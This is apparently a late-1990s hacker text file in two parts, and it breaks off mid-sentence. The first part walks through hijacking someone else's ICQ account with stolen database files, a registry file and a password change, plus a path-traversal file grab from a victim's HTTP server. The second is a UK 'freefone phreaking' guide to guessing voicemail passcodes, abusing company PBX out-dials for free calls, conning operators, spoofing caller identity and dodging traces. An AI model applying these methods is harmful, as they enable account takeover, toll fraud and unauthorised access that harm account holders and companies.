"Out PreNum"=dword:00000000 "Busy PreNum"=dword:00000000 "DND PreNum"=dword:00000000 "Chat PreNum"=dword:00000000 "File Options"=dword:00000004 "URL Options"=dword:00000004 "Chat Options"=dword:00000004 "All Options"=dword:0000000e "EXT Options"=dword:00000004 "Startup"="No" "Auto Away"="No" "Auto Hide Time"=dword:0000001e "Auto Hide"="No" "Move Server Top"="No" "Blink In Tray"="No" "Sort Lists"="Yes" "Show Online List"="No" "Remove AddFriend"="Yes" "Splash Open"="Yes" "History Last First"="Yes" "FloatTop"="Yes" "Thru Server"="No" "Join Chat"="No" "Open URL Browser"="No" "Refuse File NotInList"="No" "Overwrite ExistFile"="No" "Disable Online Alert"="Yes" "Accept Urgent In Busy"="No" "Blink Tray In AwayBusy"="Yes" "Use Contact List Color"="No" "Contact List Color"=dword:00c8b99d "Save User File"="Yes" "Auto Update"="Yes" "Search Wizard"="No" "Default Mailer"="Yes" "Pop Play Sound"="Yes" "Pop Auto Launch"="No" "Pop Check"="No" "Pop Time"=dword:0000000a "Check Headers"="Yes" "MoveToOutDelay"=dword:00000014 "MoveToOut"="No" "MoveToAwayDelay"=dword:0000000a "MoveToAway"="No" "Auto Sleep Mode"="No" "Log History Events"="Yes" "Connection Type"="Permanent" "Firewall"="Yes" "UseGivenIP"="No" "Socks"="No" "SocksPort"=dword:00000438 "SocksServer"="Enter your socks server" "ProxySocks4Host"="Enter your proxy server" "ProxySocks4Port"=dword:00000438 "UseProxySocks4"="No" "GiveStats"="No" "SocksVersion"=dword:00000004 "SocksAuthentication"=dword:00000000 "FirewallTimeout"=dword:0000001e "UseFirewallTimeout"="No" "UseFirewallRangePorts"="Yes" "FirewallFromPort"=dword:000059d8 "FirewallToPort"=dword:00007148 "Old Sockets"="No" "UserType"=dword:00000000 "Mail Receipients"=";" "Random Available"="No" "RandomGroupName"=dword:00000001 "Random Name"="#¥d¶³ 666 £[" "Allow Secure Clients Only"="Yes" "PhoneApproval"="Yes" "PhoneToneTime"=dword:00000032 "PhonePauseTime"=dword:000001f4 "PhoneBreakTime"=dword:00000028 "PhoneSettings"=dword:00000001 "PhonePauseChar"="," "PhoneLocalP"=" " "PhoneLongP"=" " "PhoneInterP"=" " "Chat RoomName"="Product Support / Suggestion" "Auto Join Chat Room"="Yes" "Novice Counter"=dword:0000000a "Menu Counter"=dword:00000013 "Servers Version"=dword:00000001 "Externals Version"=dword:00000019 "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "Novice"="No" "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00 "State Flags"=dword:00000000 "Server Msg Version"=dword:0000000b "Server Msg Shown"=dword:00000001 "Server Msg Count"=dword:00000009 "LeftButton Warning"="No" "Menu Left Click"="No" "Tip Startup"="No" "Tip Position"=dword:00000000 "MoreEvents Warning"="No" "Invisible Warning"="No" "Send Later Warning Off"="No" "Busy Warning"="No" "Away Warning"="No" "DND Warning"="No" "FT Warning"="No" "Ext Warning"="No" "Out Warning"="No" "Chat Warning"="No" "Away Message"="User is currently away\r\nYou can leave him/her a message" "Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth." [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets] "OutMsg Presets 0"="I'm out'a here. See you tomorrow!" "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later." "Away PresetsMsg 0"="Away" "Out PresetsMsg 0"="Out for the day" "Busy PresetsMsg 0"="Busy" "DND PresetsMsg 0"="DND" "Chat PresetsMsg 0"="Chat" "AwayMsg Presets 1"="I am out to lunch. I will return shortly." "OutMsg Presets 1"="" "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed." "ChatMsg Presets 1"="Come Join my chat room!" "Away PresetsMsg 1"="Lunch" "Out PresetsMsg 1"="Not here" "Busy PresetsMsg 1"="Meeting" "DND PresetsMsg 1"="Meeting" "Chat PresetsMsg 1"="Come In" "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!" "OutMsg Presets 2"="I'm closed for the weekend/holidays." "DNDMsg Presets 2"="Don't disturb my concentration!" "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!" "Away PresetsMsg 2"="Be right back" "Out PresetsMsg 2"="Closed" "Busy PresetsMsg 2"="Concentration" "DND PresetsMsg 2"="Concentration" "Chat PresetsMsg 2"="Fun" "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished." "OutMsg Presets 3"="Gone fishin'." "DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!" "ChatMsg Presets 3"="What are you waiting for? Come on in!" "Away PresetsMsg 3"="Dog Walk" "Out PresetsMsg 3"="Fishing" "Busy PresetsMsg 3"="On the Phone" "DND PresetsMsg 3"="On the Phone" "Chat PresetsMsg 3"="Don't Wait" "AwayMsg Presets 4"="Went out for a smoke. " "OutMsg Presets 4"="I'm sleeping. Don't wake me." "DNDMsg Presets 4"="I can't chat with you now. I'm busy." "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat." "Away PresetsMsg 4"="Smoke" "Out PresetsMsg 4"="Sleeping" "Busy PresetsMsg 4"="Can't chat " "DND PresetsMsg 4"="Can't chat " "Chat PresetsMsg 4"="Hear" "AwayMsg Presets 5"="On my Coffee break." "OutMsg Presets 5"="Went home. Had to feed the kids." "DNDMsg Presets 5"="Can't you see I'm working?" "ChatMsg Presets 5"="Enter your chat room message here" "Away PresetsMsg 5"="Coffee" "Out PresetsMsg 5"="Kids" "Busy PresetsMsg 5"="Working" "DND PresetsMsg 5"="Working" "Chat PresetsMsg 5"="Empty" "AwayMsg Presets 6"="Went to get some fresh air." "OutMsg Presets 6"="Gone for good." "DNDMsg Presets 6"="Enter your occupied message here" "ChatMsg Presets 6"="Enter your chat room message here" "Away PresetsMsg 6"="Air" "Out PresetsMsg 6"="Gone" "Busy PresetsMsg 6"="Conversing" "DND PresetsMsg 6"="Empty" "Chat PresetsMsg 6"="Empty" "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered." "DNDMsg Presets 7"="Enter your occupied message here" "ChatMsg Presets 7"="Enter your chat room message here" "Away PresetsMsg 7"="Empty" "Out PresetsMsg 7"="Empty" "Busy PresetsMsg 7"="Empty" "DND PresetsMsg 7"="Empty" "Chat PresetsMsg 7"="Empty" "BusyMsg Presets 0"="User is currently Occupied" "ChatMsg Presets 0"="I would like to chat about anything" "BusyMsg Presets 1"="User is currently Occupied1" "BusyMsg Presets 2"="User is currently Occupied2" "BusyMsg Presets 3"="User is currently Occupied" "BusyMsg Presets 4"="User is currently Occupied" "BusyMsg Presets 5"="User is currently Occupied" "BusyMsg Presets 6"="User is currently Occupied" "AwayMsg Presets 7"="User is currently away" "OutMsg Presets 7"="User is currently N/A" "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0] "Message"="Please bookmark our network status page." "URLName"="http://www.mirabilis.com/status.html" "URL"="press here" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1] "URLName"="http://www.mirabilis.com/emailsig.html" "URL"="Go to the ICQ e-mail signature generator" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2] "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )" "URLName"="http://www.icq.com/announcements/02.html" "URL"="It's fun and easy, GO!!" "Date"="31-MAR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3] "URLName"="http://www.icq.com/announcements/whitepages.html" "URL"="Go!" "Date"="1-APR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4] "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!" "URLName"="http://www.mirabilis.com/email.html" "URL"="E-mail notification instructions" "Date"="15-JUN-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5] "URLName"="http://www.icq.com/announcements/05.html" "URL"="Create your Greeting" "Date"="12-JUL-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="26-AUG-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7] "Message"="ICQ can alert you when you receive Emails and show you the Email headers!" "URLName"="http://www.icq.com/announcements/07.html" "URL"="Learn how to do it" "Date"="06-SEPT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="20-OCT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1] "Name"="General Chat" "Number"=dword:00000001 "Version"=dword:00000001 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2] "Name"="Romance" "Number"=dword:00000002 "Version"=dword:00000002 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3] "Name"="Games" "Number"=dword:00000003 "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4] "Name"="Students" "Number"=dword:00000004 "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5] "Name"="20 Something" "Number"=dword:00000006 "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6] "Name"="30 Something" "Number"=dword:00000007 "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7] "Name"="40 Something" "Number"=dword:00000008 "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8] "Name"="50 Plus" "Number"=dword:00000009 "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1] "Host"="icq1.mirabilis.com" "Port"=dword:00000fa0 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta] "Type"="Command" "Command Line"="/ip:" "Path"="C:\\Program Files\\Canasta\\Canasta.exe" "URL"="http://ourworld.compuserve.com/homepages/mharte" "Version"=dword:0000000f [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone] "Type"="Extension" "Format"="/p:tcp /ac:" "Extension"="cvp" "URL"="http://www.connectix.com/html/videophone.html" "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme] "Type"="Command" "Command Line"="" "Path"="C:\\CUSEEME\\CUSEEM32.EXE" "URL"="http://www.cu-seeme.com/" "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone] "Type"="Extension" "Format"="" "Extension"="iru" "URL"="http://irisphone.com/" "Version"=dword:0000000a [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat] "Type"="ServerExtension" "Format"="1.1\\n-u 1 -a " "Extension"="vce" "NumParameters"=dword:00000002 "Server1"="vchat1.microsoft.com" "URL"="http://vchat1.microsoft.com" "Version"=dword:00000011 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1] "ParamName"="World" "CanOtherChange"="No" "Param1"="#Compass" "Param2"="#BugWorld" "Param3"="#Fishbowl" "Param4"="#Lodge" "Param5"="#Lunar" "Param6"="#Lodge" "Param7"="#Practice" "Param8"="#RedDen" "Param9"="#TableTop" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2] "ParamName"="Avatar" "CanOtherChange"="Yes" "Param1"="Amani" "Param2"="Anderson" "Param3"="Brb" "Param4"="Cat" "Param5"="Crab" "Param6"="Dancer" "Param7"="Dred" "Param8"="Duggan" "Param9"="Joey" "Param10"="Lulu" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk] "Type"="Command" "Command Line"="" "Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE" "URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html" "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx] "Type"="ClientServer" "Client Command Line"="/CLIENT %i" "Server Command Line"="/SERVER" "Client Path"="C:\\Rikken\\Rikken.exe" "Server Path"="C:\\Rikken\\Rikken.exe" "URL"="http://www.dse.nl/~ramon/rikken/" "Version"=dword:00000017 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone] "Type"="Extension" "Format"="callto://" "Extension"="vdp" "URL"="http://www.vdo.net/download/" "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall] "Type"="Command" "Command Line"="" "Path"="C:\\VidCall\\Corp.EXE" "URL"="http://www.access.digex.net/~vidcall/vidcall.html" "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone] "Type"="Extension" "Format"="" "Extension"="wpc" "URL"="http://www.webphone.com/" "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake] "Type"="ClientServer" "Client Command Line"="-mpath +connect %i" "Server Command Line"="-mpath -listen" "Client Path"="c:\\quake_sw\\Q95.bat" "Server Path"="c:\\quake_sw\\Q95.bat" "Server1"="quake.xmisson.com" "URL"="http://www.idsoftware.com" "Version"=dword:00000010 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat] "Type"="ServerCommand" "Format"="GROUPNAME=i PORT=15000" "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe" "NumParameters"=dword:00000001 "Server1"="voxchat1.voxware.com" "Server2"="voxcha2.voxware.com" "URL"="http://www.voxchat.com/low/download.htm" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1] "ParamName"="Room" "CanOtherChange"="No" "Param1"="#ICQ" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations] "LastUpdate"=dword:00000000 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main] "SelectedCell"=dword:00000000 "AlwaysOnTop"="Yes" "LeftBarWidth"=dword:000000ad "RightBarWidth"=dword:000000ad "FloatBar-Left"=dword:00000255 "FloatBar-Right"=dword:00000307 "FloatBar-Top"=dword:00000033 "FloatBar-Bottom"=dword:000001f3 "State"="Floating" "Minimized"="No" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows] "Response"=dword:008f00c9 "SearchWiz"=dword:006f00c0 "NotifyWiz"=dword:006f00c0 "posNovice"=dword:009300dc "posMOTD"=dword:00af00b7 "posMenuConfig"=dword:00a900e7 "RemoveUIN"=dword:00bb0108 "Message"=dword:008b004f "Security"=dword:007400b4 "Prefs"=dword:007f00ae "History"=dword:0096003a "File Request"=dword:009000f0 "FileTransfer"=dword:009700ae "Info"=dword:009300d2 "FetchUser"=dword:00e9010e "URL Message"=dword:00a00069 "Away"=dword:00bd00f7 "Chat Request"=dword:009f00dd "Contacts List"=dword:008300bd "Chat"=dword:008b00f5 "Phone"=dword:000a000a "Phone Call Request"=dword:007700e5 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search] "Place"=dword:00a400cc "Type"=dword:00000002 "Width"=dword:01880188 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat] "ChatStyle Counter"=dword:00000003 "Pen Color"=dword:0080ffff "Back Color"=dword:00004000 "Send Focus"="Yes" "Enable Sounds"="Yes" "Name Bars"="Yes" "Always On Top"="No" "AutoColor"="No" "OverRide Format"="Yes" "Show Toolbar"="Yes" "State"=dword:00010000 "New Font Name"="Times New Roman" "Char Set"=dword:00000000 "IRCListWidth"=dword:00000006 "Font Pitch"=dword:00000012 "New Font Height"=dword:0000000e "Font Effects"=dword:00000000 "AutoColor 0"=dword:00000000 "AutoColor 1"=dword:00000080 "AutoColor 2"=dword:00008000 "AutoColor 3"=dword:00008080 "AutoColor 4"=dword:00800000 "AutoColor 5"=dword:00800080 "AutoColor 6"=dword:00808000 "AutoColor 7"=dword:00808080 "AutoColor 8"=dword:00c0c0c0 "AutoColor 9"=dword:000000ff "AutoColor 10"=dword:0000ff00 "AutoColor 11"=dword:0000ffff "AutoColor 12"=dword:00ff0000 "AutoColor 13"=dword:00ff00ff "AutoColor 14"=dword:00ffff00 "AutoColor 15"=dword:00ffffff "Place-Left"=dword:0000000a "Place-Right"=dword:000001fe "Place-Top"=dword:0000000a "Place-Bottom"=dword:0000021a "New LogFile name"="ICQChatLog.txt" "New SaveFile name"="ICQChatSave.txt" 4. Save the file as HACKEDICQ.REG 5. If you have ICQ open, close it. 6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory ex: c:\progra~1\ICQ\db 7. Open the HACKEDICQ.REG file 8. When it asks if you would like to add this to your registry, click YES. 9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB" 10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it manually. 11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there's 2 things that may have happened: I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK. II. They are sill online. The only thing you can do is wait until they go offline. 12. Once you are successfully in the users ICQ, quickly change the users password. Once this is complete, you will be in total control over the users ICQ account. Mission success. ICQ Exploit Tips ----------------- Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys. I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it. The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100% safe for you to do so. Shadow51 29000000 Shadow51@hackcity.com ***BEGINNERS FREEFONE PHREAKING IN THE UK (1998)*** *************************************************** (I Couldn't get in contact with the authors of this file, but it's a good text non the less so, In it goes - The Information is still relevant even though it's from 98 - CrossFire) - by uV & Senor Cardini - DISCLAIMER (All the information in this file is for educational purposes only. No-one involved in the compilation of this file would suggest using it for any purposes leagal/illegal whatsoever. In fact it might all be complete bollocks for all we know etc) !! Loadsa phun to be had on freephone numbers !! Freefone phreaking is calling freephone (0500/0800) numbers and using the interesting systems that are often on the other end. This often means accessing company's phone system to obtain free calls or services. I will cover the three main areas:- VMB Hacking, Dial-Outs and Conference System abuse. There are countless other systems on 0800's that are not covered here. **Scanning** You need to scan a lot of 0800/0500 numbers to find useful numbers. You can't use a scanning program like Toneloc here as you are not looking for a modem carrier signal. This means dialling hundreds of numbers by hand. Apparently BT are able to detect mass 0800 scanning done from your home phone but I know lots of people who have called 1000's and never heard a peep. Still a phone box is better if you're paranoid. You may reach foreign systems on UK 0800 numbers. The 0800 89XXXX range is full of these as is the 0800 9XXXX range. These are also referred to as Country Direct numbers (check out the back of you BT Book). These are cool as you may get access to systems in that country. USA numbers a great because the US has loads more conferences, loops and PBX's than we do and lots of these are on the WWW. Companies are getting wise to abuse of their systems. Certain numbers are always getting hacked and are now completely blocked. It might be worth avoiding the 0800 89xxxx range for this reason 0500 numbers don't get anywhere near as much attention...:-) So choose the range of numbers you are going to scan and get going. Make a note of what you find and what time you dialled. It is best to dial out of hours for whatever country the line terminates in. Otherwise a lot of numbers will be picked up by a human. You are looking for dial-tones, other tones and automated attendants, mail-boxes etc. Getting in: Let's say you have the number of an American company on a 0800 89XXXX. This might answer as "Welcome to ABC company voice-mail system, if you know the number of the person you want to reach dial it now. If you have a mail-box on the system press 9. If you want to reach assistance dial 0 or stay on the line`. Listen to the whole message - there may be other options. If you get no options try the * or # keys or combinations of these with numbers like 1,8 or 9. This may throw you into the voice mail. You may have to leave a message and then try to break out. Get a range: Try dialling some extensions and get an idea of the range of numbers accepted. You are starting to map the system. Some extensions (often at the end of the allowable range or a one off number like 2000, 4444 etc.) will have an out-dial on it. **The Systems** *VMB's This is accessing voice-mail systems and using the features to your own ends. You can set up your own free voice-mail box or listen to confidential messages etc. This is obviously boring after the first few times. The real interest comes when there is an out-dial, conference box or whatever on the system that is only accessible by valid mailbox owners. This centres around the fact that most VMB passwords are either the same as the box number (Box=3300, PW=3300), a crappy default (1234), easy to remember/guess (1111, 1234 etc.) or similar (box number+0). When you enter the voice-mail system it will often tell you what make it is Meridian, Octel, Norstar or whatever. This obviously helps a lot, although particularly sad individuals will come to recognise them by the prompts anyway. You really need to try all these numbers and map out systems for yourself to get a good idea of what's out there. There are loads of texts specific VMB brands. I reckon Meridian are the easiest to hack (pass-code is the box number as default and they have an excellent help facility - press the * key). I will only touch on Meridian systems to give you an idea of how they work. A lot of the points are relevant to other systems. Meridian Voice-mail:- I suggest you read Coldfire's text on Meridians. I won't go into details as he does it well and I don't want to quote it word for word. I will therefore cover the practical hacking aspects I will assume you will go get that text! Ok here are a few of the more essential ones *8 is mailbox commands *7 is message commands *81 is login 011 is name-directory 011# is dial any number/extension - depends on whether you're logged in/masks etc(see below) *80 is mailbox features - options here to allow to to change the number that is dialled when 0 is pressed (normally the opertator) - has some potential... Lets say you called a company, pressed * and got "Hello, you have reached the voice-mail system. If you have a mailbox on the system press pound(#), or if you wish to reach someone and know the 4 digit extension please dial it now" If you press # you get "Meridian Mail. Mailbox?" - this is expecting a 4 digit code+# and a 4 digit-pass-code+#. Unfortunately you have no idea of the allowable codes. They could be random or more likely within a certain range. 3000 is normally a good shot BUT seeing as the login sequence will only let you know whether you have got BOTH codes correct you'll have a hard time hacking it. Go back to the original prompt and try some extension numbers until you get one or two that work. Seeing as the box numbers are always the same as the extension numbers so now you know some valid box numbers or better still the range of valid box numbers. Ideally you want unused boxes in their default state. These unused extension/boxes don't have a "Hi leave a message for John Smith here" on them. Depending where you are in the system. Dialling 011 will put you through to a directory system where you can dial in a name using the number/letter combinations on you telephone keypad. Try SMITH or JONES, you should get a few numbers this way. Once you have valid boxes you need the pass-codes, so go to the login (*81) and try the default pass-code, i.e. the box number itself. Empty boxes are more likely to work in this way, failing that try some 1234, 1111 sequences (good for thick giggly admin department boxes :)). You should be able to get at least one box this way. You will have noticed that 3 unsuccessful pass-code tries will throw you out. With one valid box you can get around this. Try 2 boxes then log into your valid box, now try two more and so on until you get more boxes. As long as you enter one valid code combination in 3 you are fine. This is the sort of feature that most systems have and makes hacking them much easier. To see if you have an out-dial here enter 09+number to dial+# if it dials you have got one (remember to work out what country your system is in first though). Which brings us on to.... *Out-dials This is basically dialling into a company's phone system (PBX), gaining access and dialling out. The net result is that you only pay for the call to the company. If this is an 0800 number then you don't pay anything. There are two ways you might come across out-dials. 1. Straight-forward PBX extenders Background:- A company wants it's sales staff to be able to call internationally from home for free so they set up an 0800 PBX extender. This allows the person to dial free to the company number and then out to the desired destination (on the company bill). They work mostly like this: you dial a certain number and get another dialling-tone, another sort of tone or even a voice-prompt ("enter your 4 digit ID" etc.). An incorrect tone will often give a two-tone alarm signal (don't worry it is just an audible prompt). Once you enter the correct code (normally plus a #) you may get another dial-tone which you can use as if dialling from you own phone. You may have to enter 9 or 0 or similar to get a line. You may need to add a # to the end of the number. Hacking them:- These are only easy to hack if the code is something stupid like 1111, 2222, 1234 etc., +# which it often is. The first thing you need to know is the length of the code. You may be able to get this by entering in the numbers very slowly and listening. After the correct number of digits there may be the alarm tone or a soft click. If not you have to assume it is 4 or less. If it is not you are going to have a hell of a job cracking it anyway! Try the common defaults as described and any other easy-to-remember numbers. You may notice that it bleeps you out after only 2 numbers when say entering 12 but after 4 numbers when trying 4567. This may be a clue to the start of the sequence. If you have a group of bored, nerdy friends (you may be a student for example.;-)) you can split up the 9999 possible combinations between you. This should only take 10 of you a couple of hours. The speed of these things is often dependant on how many tries a system lets you have before throwing you out. Another way is to use a PBX Hacker program which I won't go into except to say that they come with their own documentation, they don't often work unless you know the exact format of the switch (PBX) and can't be used from phone boxes (can you explain 9999 calls to the same number?!) 2. "Hidden" PBX's. Background:- Most larger companies have their own PBX systems with 0800 access numbers. Some of them will intentionally want people to be able to dial though them, others just don't know it can be done or have configured them incorrectly. Their out-dial may be on a certain extension or hidden behind a VMB (See the VMB section on Meridians) Hacking them:- This can be as easy as ringing the sales line 0800 of some company, asking for another dept, say accounts, asking to be put though to the operator and saying "Hi I'm Dave from accounts, I can't seem to get an outside line. Could you dial this number for me?" - this may or may not work!. There are a number of ways depending on the make of the system and the way it is configured. I can't give you a sure-fire way on all systems. You may just be able to dial 9+the- number-you-want+# or 09+.... Etc. You may have to try every extension until you get a tone. You may have to hack the systems admin. box first to change some options. You may have to hack a certain box. Meridian systems often allow 09+number+# but only after you have logged in successfully to a mail-box. There may be calling masks set up by the administrator which restrict outgoing calls to nil or a limited range (e.g. local calls or free-fone calls only). So (on most Meridians for example) having a valid box/code is not always enough. However, you may be able to fool the mask on a UK system by entering 141 in front of the number you want as the system is often checking for zeros. Keep trying different 0800 numbers until you find systems that you can hack. ANY fool can hack a Meridian. You will find some with out-dials once you have, you have got your phree calls without any fancy kit. *What is the real number?** Although you may be dialling an 0800 number you can be sure that there is a normal number like 01454 654312 or whatever linked to it. If you dial 17070 (in BT areas) from your out-dial it will tell you what number you are really at. If this doesn't work dial your own number and do a 1471 job on it. This means that if you want to pretend to be someone else or specifically to pretend to be from that company you can! All but a really determined trace will do is show up the wrong number. *Linking them up* Linking up your out-dials will extend their usefulness. If you have an 0800 out-dial that terminates in the USA thus allowing dialling to US numbers you can use it to dial 1-800 numbers which are the yank equivalent of our 0800 numbers. Americans are way ahead in the use of mail/switching systems and there are out-dials, conferences etc. abound. *Keeping hold of them* Using out-dials is obviously illegal. Not only are you gaining unauthorised access to a system (i.e. hacking) but you are stealing call credit from the company. BT and the company have a vested interest in stopping you or catching you. Here are some guidelines: I. The first rule is do not give the numbers/codes out to anyone else. As soon as you do you can be sure that they will too and so on, and so on. At least one of these people will be a twat, use it to call Mexican sex-lines for 4 hours at 2am on a Sunday. It will either get closed down or they will set up a trace. II. Use them wisely. As with all crime, you should be fine unless you get noticed. So if you call numbers that are likely to be called from that company, are of a normal length, during normal times etc. you are unlikely to raise any eyebrows. III. Linking out-dials up makes tracing your call much harder, especially if you cross international boundaries. This will often throw the phone companies systems and can make prosecution harder. The most likely way of tracing calls is going to be from the point which you 1st call in at. Seeing as you are only making freefone calls from that point it will not be showing up in any bills. They are not losing and are not monitoring. Should the second company notice they will trace it back to the first company. Do this through 3 or 4 and things start looking good for you! IV. Try not to use them from home V. Don't stay on for long. Using one out-dial to acess the Intenet for hours at a time is one way of getting noticed. VI. Be paranoid. No matter how careful you are being, there may be others using the same out-dial recklessly. You could get caught in the same net. It is a good idea to tell you call recipient to have a cover story ready in case they are called to see who called them at a certain time. "Oh yeah, I have been getting odd calls, some time they just don't speak to I just leave the receiver off the hook and come back to it in an hour" or 